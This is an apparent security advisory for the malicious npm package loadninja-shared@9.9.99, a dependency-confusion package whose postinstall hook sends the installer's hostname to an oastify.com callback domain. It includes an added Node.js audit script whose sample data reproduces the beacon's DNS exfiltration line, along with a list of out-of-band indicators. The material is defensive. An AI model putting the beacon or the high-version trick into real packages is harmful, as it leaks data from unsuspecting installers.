MAL-2026-5744
Malicious code in loadninja-shared (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46)

loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares `"postinstall": "node beacon.js"`, which fires automatically on `npm install`. beacon.js reads `os.hostname()` and transmits it, together with a nonce and the package name, to the attacker-controlled out-of-band domain `tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com` (Burp Collaborator infrastructure) over both a DNS lookup (`dns.lookup(NONCE + '.' + host63 + '.' + HOST,...)`) and an HTTPS POST. The version `9.9.99` is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.
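As an added example (not part of the advisory or of either source's tooling), a small Node.js audit that applies the two signals described above to records a defender assembles from package-lock.json (`resolved`, `version`) and each installed package's package.json (`scripts`, plus the files an install hook invokes): an internally-named package resolved from the public registry, and an install-time lifecycle script whose referenced file contains out-of-band indicators. The record shape, the `INTERNAL_NAMES` allowlist and the sample entries are constructed assumptions.

```javascript
// Added audit helper, not code from the advisory. Input records are assumed to
// be built by the caller from package-lock.json and node_modules/*/package.json.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
const PUBLIC_REGISTRY = 'registry.npmjs.org';
// Strings whose presence in an install-hook script body warrants review.
const OOB_INDICATORS = ['oastify.com', 'dns.lookup', 'os.hostname', 'https.request'];

function auditPackages(records, internalNames) {
  const findings = [];
  for (const r of records) {
    const host = r.resolved ? new URL(r.resolved).host : null;
    // Signal 1: a name reserved for the internal registry came from the public one.
    if (internalNames.has(r.name) && host === PUBLIC_REGISTRY) {
      findings.push({ name: r.name, version: r.version, indicators: [],
        reason: 'internal package name resolved from the public registry' });
    }
    // Signal 2: an install-time hook, inspected for out-of-band callback patterns.
    for (const hook of INSTALL_HOOKS) {
      const cmd = r.scripts && r.scripts[hook];
      if (!cmd) continue;
      const body = Object.entries(r.files || {})
        .filter(([file]) => cmd.includes(file))
        .map(([, content]) => content)
        .join('\n');
      const indicators = OOB_INDICATORS.filter((ind) => body.includes(ind));
      findings.push({ name: r.name, version: r.version, indicators,
        reason: `${hook} script runs "${cmd}"` });
    }
  }
  return findings;
}

// Constructed sample records; the beacon body mirrors the behaviour the advisory describes.
const SAMPLE = [
  { name: 'loadninja-shared', version: '9.9.99',
    resolved: 'https://registry.npmjs.org/loadninja-shared/-/loadninja-shared-9.9.99.tgz',
    scripts: { postinstall: 'node beacon.js' },
    files: { 'beacon.js': "const os=require('os');const dns=require('dns');" +
      "dns.lookup(NONCE+'.'+os.hostname()+'.tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com');" } },
  { name: 'loadninja-config', version: '1.4.2',
    resolved: 'https://npm.internal.example/loadninja-config/-/loadninja-config-1.4.2.tgz',
    scripts: { test: 'jest' }, files: {} },
];
// Hypothetical allowlist of names that must only ever resolve from the internal registry.
const INTERNAL_NAMES = new Set(['loadninja-shared', 'loadninja-config']);

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditPackages(SAMPLE, INTERNAL_NAMES), null, 2));
}
```

A clean result is an empty array; in practice, gate CI on `findings.length === 0` and route anything flagged to review.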
## Source: ossf-package-analysis (1ead72fc15074f049a104031ef60cad8af0f0680d1bf5ffee1492f500a3506d8)

The OpenSSF Package Analysis project identified 'loadninja-shared' @ 9.9.99 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
Affected packages
No fixed version published yet for loadninja-shared (npm). Pin to a known-safe version or switch to an alternative.